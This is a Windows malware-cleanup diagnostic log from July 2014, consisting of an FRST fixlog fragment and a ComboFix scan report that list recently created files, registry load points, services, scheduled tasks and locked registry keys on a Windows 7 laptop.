DACL(PAI):

BUILTIN\Administrators ALLOW FULL (NI)
BUILTIN\Administrators ALLOW FULL (OI-CI-IO)
NT AUTHORITY\SYSTEM ALLOW FULL (NI)
NT AUTHORITY\SYSTEM ALLOW FULL (OI-CI-IO)
BUILTIN\Users ALLOW READ (NI)
BUILTIN\Users ALLOW READ (OI-CI-IO)

===================================

==== End of Fixlog ====

COMBOFIX

ComboFix 14-07-16.02 - Ric 07/17/2014   8:48.2.8 - x64
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.8180.6348 [GMT -4:00]
Running from: c:\users\Ric\Desktop\ComboFix.exe
SP: Windows Defender *Enabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 * Created a new restore point
.
.
(((((((((((((((((((((((((   Files Created from 2014-06-17 to 2014-07-17  )))))))))))))))))))))))))))))))
.
.
2014-07-17 12:59 . 2014-07-17 12:59 -------- d-----w- c:\users\TEMP.Dell-XPS-1645\AppData\Local\temp
2014-07-17 12:59 . 2014-07-17 12:59 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-07-16 14:48 . 2014-07-17 12:41 -------- d-----w- C:\FRST
2014-07-14 16:08 . 2014-07-14 17:27 -------- d-----w- c:\windows\SysWow64\wbem\Performance
2014-07-14 15:20 . 2014-07-14 15:20 -------- d-----w- C:\RegBackup
2014-07-14 13:20 . 2014-07-14 13:20 -------- d-----w- c:\program files (x86)\Tweaking.com
2014-07-11 19:19 . 2014-07-11 19:19 -------- d-----w- c:\windows\ERUNT
2014-07-11 18:58 . 2014-07-12 17:01 -------- d-----w- C:\Kits
2014-07-06 18:20 . 2010-08-30 12:34 536576 ----a-w- c:\windows\SysWow64\sqlite3.dll
2014-07-06 18:17 . 2014-07-13 18:11 -------- d-----w- C:\AdwCleaner
2014-07-06 18:15 . 2014-07-06 18:15 -------- d-----w- c:\users\Ric\AppData\Local\GHISLER
2014-07-06 15:47 . 2014-07-14 15:00 122584 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\program files (x86)\Malwarebytes Anti-Malware
2014-07-06 15:46 . 2014-07-06 15:46 -------- d-----w- c:\programdata\Malwarebytes
2014-07-06 15:46 . 2014-05-12 11:26 63704 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-07-06 15:46 . 2014-05-12 11:26 91352 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-07-06 15:46 . 2014-05-12 11:25 25816 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-07-05 18:22 . 2014-07-09 19:33 -------- d-----w- c:\users\roy
2014-07-05 16:52 . 2014-07-13 17:30 -------- d-----w- C:\Roy
2014-06-25 23:54 . 2014-06-26 00:02 -------- d-----w- c:\users\Ric\AppData\Roaming\Feeqvena
2014-06-25 23:50 . 2014-07-06 17:39 -------- d-----w- c:\programdata\IculOnse
2014-06-18 13:49 . 2014-06-18 13:49 -------- d-----w- c:\programdata\Package Cache
2014-06-18 13:48 . 2014-06-18 13:48 -------- d-----w- C:\TDSSKiller_Quarantine
2014-06-18 13:47 . 2014-06-18 13:47 -------- d-----w- C:\AMD
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-16 23:35 . 2012-03-31 15:56 699056 ----a-w- c:\windows\SysWow64\FlashPlayerApp.exe
2014-07-16 23:35 . 2011-05-18 19:14 71344 ----a-w- c:\windows\SysWow64\FlashPlayerCPLApp.cpl
2014-06-11 11:40 . 2011-02-26 01:47 95414520 ----a-w- c:\windows\system32\MRT.exe
2014-06-03 20:51 . 2011-02-26 06:12 18960 ----a-w- c:\windows\system32\drivers\LNonPnP.sys
2014-05-30 10:21 . 2014-06-11 11:33 23414784 ----a-w- c:\windows\system32\mshtml.dll
2014-05-30 10:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-05-30 10:02 . 2014-06-11 11:33 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-05-30 09:45 . 2014-06-11 11:33 2768384 ----a-w- c:\windows\system32\iertutil.dll
2014-05-30 09:39 . 2014-06-11 11:33 548352 ----a-w- c:\windows\system32\vbscript.dll
2014-05-30 09:39 . 2014-06-11 11:33 66048 ----a-w- c:\windows\system32\iesetup.dll
2014-05-30 09:38 . 2014-06-11 11:33 48640 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-05-30 09:28 . 2014-06-11 11:33 51200 ----a-w- c:\windows\system32\jsproxy.dll
2014-05-30 09:27 . 2014-06-11 11:33 33792 ----a-w- c:\windows\system32\iernonce.dll
2014-05-30 09:24 . 2014-06-11 11:33 574976 ----a-w- c:\windows\system32\ieui.dll
2014-05-30 09:21 . 2014-06-11 11:33 139264 ----a-w- c:\windows\system32\ieUnatt.exe
2014-05-30 09:21 . 2014-06-11 11:33 111616 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-05-30 09:20 . 2014-06-11 11:33 752640 ----a-w- c:\windows\system32\jscript9diag.dll
2014-05-30 09:11 . 2014-06-11 11:33 940032 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-05-30 09:08 . 2014-06-11 11:33 5782528 ----a-w- c:\windows\system32\jscript9.dll
2014-05-30 09:06 . 2014-06-11 11:33 452096 ----a-w- c:\windows\system32\dxtmsft.dll
2014-05-30 09:02 . 2014-06-11 11:33 2724864 ----a-w- c:\windows\SysWow64\mshtml.tlb
2014-05-30 08:55 . 2014-06-11 11:33 38400 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-05-30 08:49 . 2014-06-11 11:33 195584 ----a-w- c:\windows\system32\msrating.dll
2014-05-30 08:46 . 2014-06-11 11:33 85504 ----a-w- c:\windows\system32\mshtmled.dll
2014-05-30 08:44 . 2014-06-11 11:33 455168 ----a-w- c:\windows\SysWow64\vbscript.dll
2014-05-30 08:44 . 2014-06-11 11:33 295424 ----a-w- c:\windows\system32\dxtrans.dll
2014-05-30 08:43 . 2014-06-11 11:33 61952 ----a-w- c:\windows\SysWow64\iesetup.dll
2014-05-30 08:42 . 2014-06-11 11:33 51200 ----a-w- c:\windows\SysWow64\ieetwproxystub.dll
2014-05-30 08:35 . 2014-06-11 11:33 608768 ----a-w- c:\windows\system32\ie4uinit.exe
2014-05-30 08:29 . 2014-06-11 11:33 631808 ----a-w- c:\windows\system32\msfeeds.dll
2014-05-30 08:28 . 2014-06-11 11:33 112128 ----a-w- c:\windows\SysWow64\ieUnatt.exe
2014-05-30 08:27 . 2014-06-11 11:33 592896 ----a-w- c:\windows\SysWow64\jscript9diag.dll
2014-05-30 08:24 . 2014-06-11 11:33 1249280 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-05-30 08:23 . 2014-06-11 11:33 2040832 ----a-w- c:\windows\system32\inetcpl.cpl
2014-05-30 08:10 . 2014-06-11 11:33 32256 ----a-w- c:\windows\SysWow64\JavaScriptCollectionAgent.dll
2014-05-30 07:56 . 2014-06-11 11:33 2266112 ----a-w- c:\windows\system32\wininet.dll
2014-05-30 07:56 . 2014-06-11 11:33 4244992 ----a-w- c:\windows\SysWow64\jscript9.dll
2014-05-30 07:50 . 2014-06-11 11:33 1068032 ----a-w- c:\windows\SysWow64\mshtmlmedia.dll
2014-05-30 07:49 . 2014-06-11 11:33 1964544 ----a-w- c:\windows\SysWow64\inetcpl.cpl
2014-05-30 07:43 . 2014-06-11 11:33 13522944 ----a-w- c:\windows\system32\ieframe.dll
2014-05-30 07:30 . 2014-06-11 11:33 1398272 ----a-w- c:\windows\system32\urlmon.dll
2014-05-30 07:21 . 2014-06-11 11:33 1790976 ----a-w- c:\windows\SysWow64\wininet.dll
2014-05-30 07:13 . 2014-06-11 11:33 846336 ----a-w- c:\windows\system32\ieapfltr.dll
2014-05-09 06:14 . 2014-05-14 13:38 477184 ----a-w- c:\windows\system32\aepdu.dll
2014-05-09 06:11 . 2014-05-14 13:38 424448 ----a-w- c:\windows\system32\aeinv.dll
2014-05-08 09:32 . 2014-06-11 11:32 3178496 ----a-w- c:\windows\system32\rdpcorets.dll
2014-05-08 09:32 . 2014-06-11 11:32 16384 ----a-w- c:\windows\system32\RdpGroupPolicyExtension.dll
2014-04-25 02:34 . 2014-06-11 11:32 801280 ----a-w- c:\windows\system32\usp10.dll
2014-04-25 02:06 . 2014-06-11 11:32 626688 ----a-w- c:\windows\SysWow64\usp10.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:51 1014344 ----a-r- c:\program files (x86)\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 131248 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"{90140000-003D-0000-1000-0000000FF1CE}"="del" [X]
.
c:\users\Ric\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\Ric\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-5-19 33322312]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableLinkedConnections"= 1 (0x1)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""
.
R0 xnvdb;xnvdb;c:\windows\System32\drivers\cixf.sys;c:\windows\SYSNATIVE\drivers\cixf.sys [x]
R1 qnmokglx;qnmokglx;c:\windows\system32\drivers\qnmokglx.sys;c:\windows\SYSNATIVE\drivers\qnmokglx.sys [x]
R1 smvowoli;smvowoli;c:\windows\system32\drivers\smvowoli.sys;c:\windows\SYSNATIVE\drivers\smvowoli.sys [x]
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 RoxWatch12;Roxio Hard Drive Watcher 12;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxWatch13.exe [x]
R2 WMCoreService;Mobile Broadband Service;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode;c:\program files (x86)\Dell\Dell WWAN\WMCore\mini_WMCore.exe servicemode [x]
R3 bcbtums;Bluetooth USB LD Filter;c:\windows\system32\drivers\bcbtums.sys;c:\windows\SYSNATIVE\drivers\bcbtums.sys [x]
R3 btusbflt;Bluetooth USB Filter;c:\windows\system32\drivers\btusbflt.sys;c:\windows\SYSNATIVE\drivers\btusbflt.sys [x]
R3 btwampfl;btwampfl;c:\windows\system32\DRIVERS\btwampfl.sys;c:\windows\SYSNATIVE\DRIVERS\btwampfl.sys [x]
R3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]
R3 BVRPMPR5a64;BVRPMPR5a64 NDIS Protocol Driver;c:\windows\system32\drivers\BVRPMPR5a64.SYS;c:\windows\SYSNATIVE\drivers\BVRPMPR5a64.SYS [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x]
R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x]
R3 qrkis;Tether Miniport;c:\windows\system32\DRIVERS\qrkis.sys;c:\windows\SYSNATIVE\DRIVERS\qrkis.sys [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 RoxMediaDB13;RoxMediaDB13;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe;c:\program files (x86)\Common Files\Roxio Shared\13.0\SharedCOM\RoxMediaDB13.exe [x]
R3 SwitchBoard;Adobe SwitchBoard;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe;c:\program files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TurboBoost;TurboBoost;c:\program files\Intel\TurboBoost\TurboBoost.exe;c:\program files\Intel\TurboBoost\TurboBoost.exe [x]
R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 PxHlpa64;PxHlpa64;c:\windows\System32\Drivers\PxHlpa64.sys;c:\windows\SYSNATIVE\Drivers\PxHlpa64.sys [x]
S0 Sahdad64;HDD Filter Driver;c:\windows\System32\Drivers\Sahdad64.sys;c:\windows\SYSNATIVE\Drivers\Sahdad64.sys [x]
S0 Saibad64;Volume Filter Driver;c:\windows\System32\Drivers\Saibad64.sys;c:\windows\SYSNATIVE\Drivers\Saibad64.sys [x]
S1 SaibVdAd64;Virtual Disk Driver;c:\windows\system32\Drivers\SaibVdAd64.sys;c:\windows\SYSNATIVE\Drivers\SaibVdAd64.sys [x]
S2 9734BF6A-2DCD-40f0-BAB0-5AAFEEBE1269;Roxio SAIB Service;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe;c:\program files (x86)\Roxio\BackOnTrack\App\SaibSVC.exe [x]
S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_0057cbec48a2d7cf\AESTSr64.exe [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 BcmBtRSupport;Bluetooth Driver Management Service;c:\windows\system32\BtwRSupportService.exe;c:\windows\SYSNATIVE\BtwRSupportService.exe [x]
S2 BOT4Service;BOT4Service;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe;c:\program files (x86)\Roxio\BackOnTrack\App\BService.exe [x]
S2 Fitbit Connect;Fitbit Connect Service;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe;c:\program files (x86)\Fitbit Connect\FitbitConnectService.exe [x]
S2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe;c:\program files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [x]
S2 PCPitstop Scheduling;PCPitstop Scheduling;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe;c:\program files (x86)\PCPitstop\PCPitstopScheduleService.exe [x]
S2 QDLService2kDell;Qualcomm Gobi 2000 Download Service (Dell);c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe;c:\program files (x86)\QUALCOMM\QDLService2k\QDLService2kDell.exe [x]
S2 rimspci;rimspci;c:\windows\system32\DRIVERS\rimspe64.sys;c:\windows\SYSNATIVE\DRIVERS\rimspe64.sys [x]
S2 risdpcie;risdpcie;c:\windows\system32\DRIVERS\risdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\risdpe64.sys [x]
S2 rixdpcie;rixdpcie;c:\windows\system32\DRIVERS\rixdpe64.sys;c:\windows\SYSNATIVE\DRIVERS\rixdpe64.sys [x]
S2 TurboB;Turbo Boost UI Monitor driver;c:\windows\system32\DRIVERS\TurboB.sys;c:\windows\SYSNATIVE\DRIVERS\TurboB.sys [x]
S3 CtClsFlt;Creative Camera Class Upper Filter Driver;c:\windows\system32\DRIVERS\CtClsFlt.sys;c:\windows\SYSNATIVE\DRIVERS\CtClsFlt.sys [x]
S3 ITECIRfilter;ITECIR Filter Driver;c:\windows\system32\DRIVERS\ITECIRfilter.sys;c:\windows\SYSNATIVE\DRIVERS\ITECIRfilter.sys [x]
S3 k57nd60a;Broadcom NetLink ™ Gigabit Ethernet - NDIS 6.0;c:\windows\system32\DRIVERS\k57nd60a.sys;c:\windows\SYSNATIVE\DRIVERS\k57nd60a.sys [x]
S3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-16 13:09 1091912 ----a-w- c:\program files (x86)\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-07-17 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2012-03-31 23:36]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-10-06 18:24]
.
2014-07-14 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001Core.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
2014-07-17 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-3536542363-2189832666-3084334477-1001UA.job
- c:\users\Ric\AppData\Local\Google\Update\GoogleUpdate.exe [2011-08-28 15:40]
.
.
--------- X64 Entries -----------
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Green]
@="{95A27763-F62A-4114-9072-E81D87DE3B68}"
[HKEY_CLASSES_ROOT\CLSID\{95A27763-F62A-4114-9072-E81D87DE3B68}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Partial]
@="{E300CD91-100F-4E67-9AF3-1384A6124015}"
[HKEY_CLASSES_ROOT\CLSID\{E300CD91-100F-4E67-9AF3-1384A6124015}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\Carbonite.Yellow]
@="{5E529433-B50E-4bef-A63B-16A6B71B071A}"
[HKEY_CLASSES_ROOT\CLSID\{5E529433-B50E-4bef-A63B-16A6B71B071A}]
2012-08-29 18:43 1284168 ----a-r- c:\program files\Carbonite\Carbonite Backup\CarboniteNSE.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-11 02:09 164016 ----a-w- c:\users\Ric\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
------- Supplementary Scan -------
.
uLocal Page = c:\windows\system32\blank.htm
uStart Page = about:blank
uDefault_Search_URL = hxxp://www.google.com/ie
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Add to Google Photos Screensa&ver - c:\windows\system32\GPhotos.scr/200
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office14\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\progra~1\MICROS~1\Office14\ONBttnIE.dll/105
IE: Send image to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send page to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
Trusted Zone: dell.com
TCP: DhcpNameServer = 192.168.0.1 205.171.3.26 205.171.2.26
.
- - - - ORPHANS REMOVED - - - -
.
AddRemove-centurytoolbar - c:\program files (x86)\centurytoolbar\uninstall.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3536542363-2189832666-3084334477-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (B 1 4 5 6) (S-1-5-5-0-303777)
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil64_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="IFlashBroker5"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{6AE38AE0-750C-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\LocalServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\FlashUtil32_14_0_0_145_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{73C9DFA0-750D-11E1-B0C4-0800200C9A66}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
@="Shockwave Flash Object"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx"
"ThreadingModel"="Apartment"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\MiscStatus]
@="0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ProgID]
@="ShockwaveFlash.ShockwaveFlash.14"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\ToolboxBitmap32]
@="c:\\Windows\\SysWOW64\\Macromed\\Flash\\Flash32_14_0_0_145.ocx, 1"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\TypeLib]
@="{D27CDB6B-AE6D-11cf-96B8-444553540000}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\Version]
@="1.0"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\VersionIndependentProgID]
@="ShockwaveFlash.ShockwaveFlash"
.
[HKEY_LOCAL_MACHINE\software\Classes\Wow6432Node\CLSID\{D27CDB70-AE6D-11cf-96B8-444553540000}]
@Denied: (A 2) (Everyone)
